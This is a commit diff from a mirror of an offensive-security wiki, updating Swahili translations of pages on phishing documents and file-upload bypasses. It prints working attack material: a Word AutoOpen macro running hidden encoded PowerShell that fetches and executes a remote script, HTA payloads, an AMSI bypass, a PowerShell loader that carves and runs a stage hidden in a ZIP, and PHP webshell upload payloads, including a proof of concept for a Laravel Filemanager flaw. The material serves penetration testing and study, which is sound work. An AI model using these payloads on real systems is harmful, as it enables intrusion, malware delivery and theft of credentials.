maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/windows-hardening/ntlm/places-to-steal-ntlm-creds.m

Browse Source
This commit is contained in:
Translator 2025-09-30 04:41:00 +00:00
parent b5a11881b9
commit a2b8389687
4 changed files with 242 additions and 153 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View File

@ -1,20 +1,20 @@
# Faili na Nyaraka za Phishing
# Phishing Files & Documents
{{#include ../../banners/hacktricks-training.md}}
## Nyaraka za Office
## Office Documents
Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiiki wa data unafanywa kwa njia ya utambuzi wa muundo wa data, kulingana na viwango vya OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Kwa kawaida, faili za Word zenye macros zinatumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\
Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
Mekanismi na vipengele vya ndani sawa vinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Kwa kawaida, faili za Word zenye macros zinatumia ugani `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha ugani wa faili na bado kuendelea kuwa na uwezo wa kutekeleza macros.\
Kwa mfano, faili ya RTF haitegemei macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macro.\
Mambo ya ndani na mifumo hiyo hiyo yanatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Unaweza kutumia amri ifuatayo kuangalia ni extension zipi ambazo zitatekelezwa na baadhi ya programu za Office:
Unaweza kutumia amri ifuatayo kuangalia ni ugani gani utakavyotekelezwa na baadhi ya programu za Office:
```bash
assoc | findstr /i "word excel powerp"
```
Faili za DOCX zinazorejelea kiolezo cha mbali (File Options Add-ins Manage: Templates Go) ambazo zina macros zinaweza pia “execute” macros.
Fayil za DOCX zinazorejelea remote template (File Options Add-ins Manage: Templates Go) ambazo zinajumuisha macros zinaweza pia kutekeleza macros.
### Kupakia Picha za Nje
@ -25,16 +25,16 @@ _**Categories**: Links and References, **Filed names**: includePicture, and **Fi
### Macros Backdoor
Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye dokumenti.
Inawezekana kutumia macros kuendesha code yoyote kutoka kwenye hati.
#### Autoload functions
Kadiri zinavyokuwa za kawaida zaidi, ndivyo uwezekano wa AV kuzitambua.
Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua.
- AutoOpen()
- Document_Open()
#### Mifano ya Macros Code
#### Mfano za Macros Code
```vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
@ -64,14 +64,14 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
```
#### Ondoa metadata kwa mkono
#### Ondoa metadata kwa mikono
Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itaonyesha Document Inspector. Bonyeza **Inspect** kisha **Remove All** karibu na **Document Properties and Personal Information**.
#### Ugani la Doc
#### Kiendelezi cha Nyaraka
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu wewe **can't save macro's inside a `.docx`** na kuna aibu inayohusiana na ugani unaounga mkono macro **`.docm`** (mfano ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huzuia kabisa). Kwa hiyo, ugani wa zamani **`.doc`** ndio suluhisho bora.
Baada ya kumaliza, chagua kwenye **Save as type** dropdown, badilisha muundo kutoka **`.docx`** kwenda **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu kiendelezi cha macro-enabled **`.docm`** (mf., ikoni ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/barua pepe huzuia kabisa). Kwa hivyo, **kiendelezi cha zamani `.doc` ndicho suluhisho bora**.
#### Malicious Macros Generators
@ -81,9 +81,9 @@ Fanya hivi kwa sababu wewe **can't save macro's inside a `.docx`** na kuna aibu
## Faili za HTA
HTA ni programu ya Windows ambayo **inachanganya HTML na lugha za scripting (such as VBScript and JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "fully trusted", bila vikwazo vya modeli ya usalama ya browser.
HTA ni programu ya Windows ambayo **inachanganya HTML na scripting languages (such as VBScript and JScript)**. Inaunda user interface na inatekelezwa kama programu "fully trusted", bila vikwazo vya browser's security model.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **huwekwa** pamoja na **Internet Explorer**, na hivyo kufanya **`mshta` dependant on IE**. Hivyo, kama imeondolewa, HTA hazitaweza kutekelezwa.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kawaida huwa **imewekwa** pamoja na **Internet Explorer**, na kufanya **`mshta` dependant on IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa.
```html
<--! Basic HTA Execution -->
<html>
@ -138,11 +138,11 @@ var_func
self.close
</script>
```
## Kulazimisha NTLM Authentication
## Kulazimisha Uthibitishaji wa NTLM
Kuna njia kadhaa za **kulazimisha NTLM authentication "remotely"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji ataziingia (hata HTTP MitM?). Au mtume mwathiriwa **anuani ya faili** ambayo itawasha **authentication** kwa kufungua folda tu.
Kuna njia kadhaa za **kulazimisha uthibitishaji wa NTLM "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifikia (hata HTTP MitM?). Au kumtumia mwathiriwa **anwani ya faili** ambayo itasababisha **uthibitishaji** kwa tu **kufungua folda.**
**Angalia mawazo haya na zaidi katika kurasa zifuatazo:**
**Angalia mawazo haya na mengine katika kurasa zilizo hapa chini:**
{{#ref}}
@ -156,24 +156,24 @@ Kuna njia kadhaa za **kulazimisha NTLM authentication "remotely"**, kwa mfano, u
### NTLM Relay
Usisahau kwamba huwezi kuiba tu hash au authentication, bali pia **perform NTLM relay attacks**:
Usisahau kwamba huwezi tu kunakili hash au authentication, bali pia **perform NTLM relay attacks**:
- [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
- [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk yenye madhara. Njia ni kwamba PowerShell loader mwenyewe imehifadhiwa ndani ya raw bytes za ZIP baada ya marker maalum, na .lnk huichonga na kuiendesha yote ndani ya memory.
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk ya hatari. Njia ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama maalum, na .lnk inachonga na kuikimbiza yote katika kumbukumbu.
Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent ya current working directory.
2) Soma bytes za ZIP na upate marker iliyowekwa (mfano, xFIQCV). Kila kitu kilicho baada ya marker ni PowerShell payload iliyowekwa.
3) Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ionekane halali.
4) Kwepa AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate stage inayofuata (mfano, ondoa wote # characters) na uitekelleze ndani ya memory.
1) Tafuta ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent wa current working directory.
2) Soma bytes za ZIP na tafuta marker iliyo hardcoded (mf., xFIQCV). Kila kitu baada ya marker ni embedded PowerShell payload.
3) Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ili ionekane halali.
4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (mf., ondoa characters zote za #) na execute ndani ya kumbukumbu.
Example PowerShell skeleton to carve and run the embedded stage:
Mfano wa skeleton ya PowerShell ili kuchonga na kuendesha hatua iliyowekwa ndani:
```powershell
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
@ -191,8 +191,8 @@ $code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
Invoke-Expression $code
```
Notes
- Usambazaji mara nyingi hutumia vibaya subdomains za PaaS zenye sifa nzuri (mfano, *.herokuapp.com) na inaweza kuweka vizuizi kwa payloads (kutoa ZIP zisizo hatari kulingana na IP/UA).
- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza alama kwenye diski.
- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
- The next stage frequently decrypts base64/XOR shellcode and executes it via Reflection.Emit + VirtualAlloc to minimize disk artifacts.
Persistence used in the same chain
- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:
@ -207,7 +207,7 @@ Hunting/IOCs
- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Long-running business threads ending with links hosted under trusted PaaS domains.
## Windows files to steal NTLM hashes
## Faili za Windows za kuiba hash za NTLM
Angalia ukurasa kuhusu **places to steal NTLM creds**:
@ -216,7 +216,7 @@ Angalia ukurasa kuhusu **places to steal NTLM creds**:
{{#endref}}
## Marejeo
## References
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)

217
src/pentesting-web/file-upload/README.md
View File

@ -2,12 +2,12 @@
{{#include ../../banners/hacktricks-training.md}}
## Mbinu za Jumla za Kupakia Faili
## Mbinu Za Kawaida za Kupakia Faili
Other useful extensions:
Nyongeza nyingine muhimu:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, .php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **Kufanya kazi na PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
@ -15,13 +15,13 @@ Other useful extensions:
- **Perl**: _.pl, .cgi_
- **Erlang Yaws Web Server**: _.yaws_
### Kupita ukaguzi wa nyongeza za faili
### Kupita ukaguzi wa extensions za faili
1. Ikiwa zinatumika, **angalia** **nyongeza zilizotajwa hapo awali.** Pia zipime kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza nyongeza halali kabla ya** nyongeza ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
1. Ikiwa zinahusika, **angalia** **extensions zilizotangulia.** Pia zijaribu kwa kutumia baadhi ya **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla ya** extension ya utekelezaji (tumia extensions zilizotangulia pia):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa herufi zote za **ASCII** na **Unicode**. (_Kumbuka unaweza pia kujaribu kutumia **nyongeza** zilizotajwa **hapo awali**_)
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa herufi zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa **hapo awali**_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
@ -31,7 +31,7 @@ Other useful extensions:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kupita vizingiti kwa **kuudanganya extension parser** upande wa server na mbinu kama **kurudia** nyongeza au **kuongeza data zisizohitajika** (byte za **null**) kati ya nyongeza. _Unaweza pia kutumia **nyongeza zilizotajwa hapo awali** kuandaa payload bora._
4. Jaribu kukwepa ulinzi kwa kudanganya parser ya extension upande wa server na mbinu kama **kuzidisha** **extension** au **kuongeza takataka** data (**null** bytes) kati ya extensions. _Unaweza pia kutumia **extensions zilizotangulia** kutengeneza payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,13 +40,13 @@ Other useful extensions:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **tabaka lingine la nyongeza** kwenye ukaguzi uliopita:
5. Ongeza **safu nyingine ya extensions** kwenye ukaguzi wa awali:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **nyongeza ya utekelezaji kabla ya nyongeza halali** na uombe server iwe misconfigured. (inafaa kutafuta misconfigurations ya Apache ambapo chochote chenye nyongeza **.php**, hata kama si lazima kinaishie kwa .php, kitaweza kuendesha code):
6. Jaribu kuweka **exec extension kabla ya extension halali** na utuamini server imepangwa vibaya. (inayofaa kutekeleza misconfigurations ya Apache ambapo chochote chenye extension **.php**, lakini si lazima kikamilike kwa .php, kitatekeleza code):
- _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, tabia ya kolon ":" itaingizwa baada ya nyongeza iliyokatazwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye nyongeza iliyokatazwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa mbinu nyingine kama kutumia jina fupi la faili. Muundo "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu pia inaweza kuwa muhimu kupita vikwazo zaidi (mfano "file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Nyongeza halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
7. Kutumia **NTFS alternate data stream (ADS)** kwenye **Windows**. Katika kesi hii, tabia ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile inayoruhusiwa. Kutokana na hilo, faili tupu lenye extension iliyoruhusiwa litasanywa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu pia kunaweza kusaidia kukwepa vikwazo zaidi (mfano "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali itakatwa. Na PHP ya hatari itabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
@ -61,13 +61,13 @@ AAA<--SNIP 232 A-->AAA.php.png
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers hukata au ku-normalize nukta za mwisho (trailing dot) kutoka kwa jina la faili lililohifadhiwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) toleo kabla ya 2.9.1, unaweza kupita ukaguzi wa nyongeza kwa:
Baadhi ya upload handlers huondoa au kurekebisha pointi zinazofuata kutoka kwa jina la faili lililosalishwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kukwepa uthibitishaji wa extension kwa:
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuiruhusu jina la faili iliyopakuliwa kuwa na nyongeza ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server hutakata nukta ya mwisho na kuhifadhi `shell.php`, ambayo itaendeshwa ikiwa itakapowekwa katika directory inayotumika kwa web (stora ya umma ya default kama `/storage/files/`).
- Kuita jina la faili iliyopakuliwa kwa extension ya PHP ikifuatiwa na nukta, mfano `shell.php.`.
- Server inakatakata nukta inayofuata na kuhifadhi `shell.php`, ambayo itaendesha ikiwa imewekwa katika directory inayotumiwa kwa web (default public storage kama `/storage/files/`).
Minimal PoC (Burp Repeater):
PoC ndogo (Burp Repeater):
```http
POST /profile/avatar HTTP/1.1
Host: target
@ -80,65 +80,65 @@ Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
```
Kisha fikia njia iliyohifadhiwa (kawaida katika Laravel + LFM):
Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
```
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Tekeleza strict server-side allowlists na thibitisha tena persisted filename.
- Serve uploads kutoka maeneo yasiyo-executable.
- Sasisha unisharp/laravel-filemanager to ≥ 2.9.1.
- Enforce strict server-side allowlists and re-validate the persisted filename.
- Tumikia uploads kutoka maeneo yasiyo-executable.
### Kuepuka Content-Type, Magic Number, Compression & Resizing
### Bypass Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (ili kudanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (kuwatatanisha amri ya _file_). Au weka shell ndani ya **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au unaweza pia **kuingiza payload moja kwa moja** ndani ya image:\
`\` or you could also **introduce the payload directly** in an image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- Ikiwa **compression inayoletwa kwenye image yako**, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitatumika. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- Ikiwa **compression inaongezwa kwenye picha yako**, kwa mfano kwa kutumia baadhi ya maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitakuwa za msaada. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayodumu baada ya compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- Ukurasa wa wavuti pia unaweza kuwa unafanyia **resizing** image, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- Tovuti pia inaweza kuwa iki**resize** picha, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayodumu baada ya compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Mbinu nyingine ya kutengeneza payload inayestahimili image resizing, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- Mbinu nyingine ya kutengeneza payload ambayo **inadumu baada ya image resizing**, ikitumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayodumu baada ya compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Mbinu Nyingine za Kuangalia
- Tafuta udhaifu wa kubadilisha jina la faili iliyopakuliwa tayari (ili kubadilisha extension).
- Tafuta Local File Inclusion vulnerability ili kutekeleza backdoor.
- **Possible Information disclosure**:
- Tafuta udhaifu wa **kubadilisha jina (rename)** kwa faili ambayo tayari imepakizwa (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kuendesha backdoor.
- Uwezekano wa kufichuliwa kwa taarifa:
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) **faili ile ile** yenye **jina moja**
2. Pakia faili yenye **jina** la **file** au **folder** ambalo **tayari lipo**
3. Kupakia faili yenye majina ya `"." , "..", or "…"` kama jina lake. Kwa mfano, kwenye Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, jina la faili "." litaunda faili liitwalo "uploads" katika directory "/www/".
4. Pakia faili ambayo inaweza isiwe rahisi kufutwa kama **"…:.jpg"** kwenye **NTFS**. (Windows)
5. Pakia faili kwenye **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili kwenye **Windows** ukitumia **reserved** (**forbidden**) **names** kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia an executable (.exe) au `.html` (inayoonekana isiyoshtua) ambayo itatekeleza code inapofunguliwa kwa bahati mbaya na mwanaathiriwa.
2. Pakia faili lenye **jina** la **faili** au **folda** ambayo tayari ipo
3. Kupakia faili yenye **"." , "..", au "…" kama jina lake**. Kwa mfano, kwenye Apache katika **Windows**, ikiwa application inaweka faili zilizopakiwa katika saraka "/www/uploads/", jina la faili "." litaumba faili liitwalo "uploads" katika saraka "/www/".
4. Pakia faili ambayo inaweza kuwa ngumu kufutwa kama **"…:.jpg"** katika **NTFS**. (Windows)
5. Pakia faili kwenye **Windows** yenye **herufi zisizokubalika** kama `|<>*?”` kwenye jina lake. (Windows)
6. Pakia faili kwenye **Windows** ukitumia majina yaliyohifadhiwa (yaliyoruhusiwa kutumika) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia **executable** (.exe) au **.html** (inayoonekana isiyo hatari) ambayo **itaendesha code** inapofunguliwa kwa bahati mbaya na mwathiriwa.
### Special extension tricks
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [tazama njia ya **.htaccess** ya kuendesha code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [tazama njia ya **.config** ya kuendesha code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza **kutumika kama php file** (kuzitekeleza kwa php, au kuzijumlisha ndani ya script...)
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza kutumika kama **faili ya php** (kuziendesha kwa php, au kuzijumuisha ndani ya script...)
Extension ya `.inc` mara nyingi hutumika kwa php files zinazotumika tu **kuimport files**, hivyo, wakati fulani, mtu anaweza kuruhusu **extension hii itekelezwe**.
Extension ya `.inc` wakati mwingine hutumika kwa faili za php zinazotumiwa tu kuingiza/import files, kwa hivyo, pengine, mtu anaweza kuwa amemruhusu **extension hii itekelezwe**.
## **Jetty RCE**
Ikiwa unaweza kupakia faili ya XML kwenye Jetty server unaweza kupata [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama inavyoonyeshwa kwenye picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
Ikiwa unaweza kupakia faili ya XML kwenye server ya Jetty unaweza kupata [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hiyo, kama ilivyoonyeshwa katika picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
Kwa uchambuzi wa kina wa udhaifu huyu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Kwa uchunguzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Udhaifu za Remote Command Execution (RCE) zinaweza kutumika kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files hutegemea syntax maalum kujumuisha "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kujumuisha yaliyomo ya file. Miongoni mwa schemes mbalimbali zinazotambuliwa na uWSGI, scheme ya "exec" ni hasa yenye nguvu, ikiruhusu kusoma data kutoka standard output ya mchakato. Kipengele hiki kinaweza kutumiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapototolewa.
